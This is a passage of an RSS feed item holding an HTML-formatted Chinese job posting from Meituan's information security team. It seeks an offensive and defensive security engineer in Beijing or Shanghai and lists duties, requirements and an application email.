20px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;text-align: justify;font-size: 14px;visibility: visible;"><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;">工作地点</strong></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;">北京/上海</p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;">岗位属性</strong></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;">社招</p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;">岗位职责</strong></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;">负责美团安全攻防能力建设，包括但不限于日志/漏洞/后门分析，安全事件响应调查，安全检测策略和模型的开发设计，安全评估/渗透测试。</p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;">岗位要求</strong></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;visibility: visible;">1.3年以上工作经验，熟悉网络安全攻防技术和工具，熟悉常见的Web/系统安全漏洞及原理；<br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/>2.熟悉Linux/Windows系统原理，并能以Linux/Mac作为工作平台；<br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/>3.熟悉至少一种编程语言，如Python，C，Java，GO等；<br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/>4.熟悉业界安全攻防动态，追踪新的安全漏洞，能够分析漏洞原理和实现PoC编写；<br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/>5.能够无障碍阅读英文技术Paper；<br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;visibility: visible;"/>6.热爱安全工作，具备优秀的逻辑思维能力，对解决挑战性问题充满热情，善于解决问题和分析问题。</p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;"><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;">优先条件</strong></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;">有互联网企业安全工作经验。</p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;"><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;">岗位亮点</strong></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;">1.能够接触到互联网公司的架构，了解到安全在大型互联网公司落地的最佳实践；<br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;clear: both;min-height: 1em;white-space: normal;">2.参与互联网公司海量服务下的入侵检测</p></section></section></section></section><p style="margin-bottom: 0px;"><br/></p><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(34, 34, 34);font-family: system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14px;">投递邮箱：</span><span style="font-size: 14px;letter-spacing: 0.544px;">EDP.src@meituan.com</span></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(34, 34, 34);font-family: system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14px;">邮件主题：</span><span style="font-size: 14px;letter-spacing: 0.544px;">【意向岗位+城市】</span><span style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-align: justify;"></span></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(34, 34, 34);font-family: system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="font-size: 14px;letter-spacing: 0.544px;">更多岗位见：</span></section><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(34, 34, 34);font-family: system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="font-size: 14px;letter-spacing: 0.544px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI5MDc4MTM3Mg==&amp;mid=2247490335&amp;idx=1&amp;sn=02e76b0a2f09651f4f1a3628e30a8a60&amp;chksm=ec1bfaccdb6c73da597f69b9c386253db9869517993bcbd90950cad17c659fd4bc16f1cad886&amp;scene=21#wechat_redirect" textvalue="招聘 ｜ 在线等秋天的第一封简历，期待你加入美团信息安全～" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" style="margin: 0px;padding: 0px;color: rgb(87, 107, 149);text-decoration: none;font-family: mp-quote, -apple-system-font, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;" data-linktype="2">招聘 ｜ 在线等秋天的第一封简历，期待你加入美团信息安全～</a></span></section>



<p><a href="https://mp.weixin.qq.com/s/Xma1TPnwLGXnXrnqbl4o9g#rd">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=87d5aab6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487300%26idx%3D1%26sn%3Dd2bb372406293f3dc888dba831925c65%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 29 Aug 2022 18:00:00 +0800</pubDate>
    </item>
  </channel>
</rss>